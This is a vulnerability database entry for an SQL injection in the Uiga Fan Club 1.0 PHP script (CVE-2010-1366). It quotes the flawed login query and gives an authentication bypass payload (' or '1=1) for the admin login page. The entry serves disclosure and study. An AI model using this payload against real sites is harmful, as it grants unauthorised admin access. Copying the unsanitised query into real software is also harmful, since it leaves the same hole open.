Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Uiga Fan Club 1.0 remote SQL injection vulnerability
2010-03-01 / 2010-03-02
Credit:
cr4wl3r
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2010-1366
CWE:
CWE-89
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability ########################################################################### # Author: cr4wl3r # Download: http://www.scriptdevelopers.net/download/uigafanclub.zip ########################################################################### #if (isset($_POST['admin_name'])) # { # $admin_name=$_POST['admin_name']; # $admin_password=$_POST['admin_password']; # # # if(empty($admin_name)) # { # $errorMessage=warning." Username is empty!"; # } # elseif(empty($admin_password)) # { # $errorMessage=warning." Password is empty!"; # } # # # else # { # $sql="SELECT * # FROM admin # WHERE admin_name='$admin_name' and admin_password='$admin_password'"; # ########################################################################### ############################################### PoC: [path]/admin/admin_login.php Username: ' or '1=1 password: ' or '1=1 ###############################################
Referencje:
http://www.exploit-db.com/exploits/11593
http://packetstormsecurity.org/1002-exploits/uigafanclub-sql.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top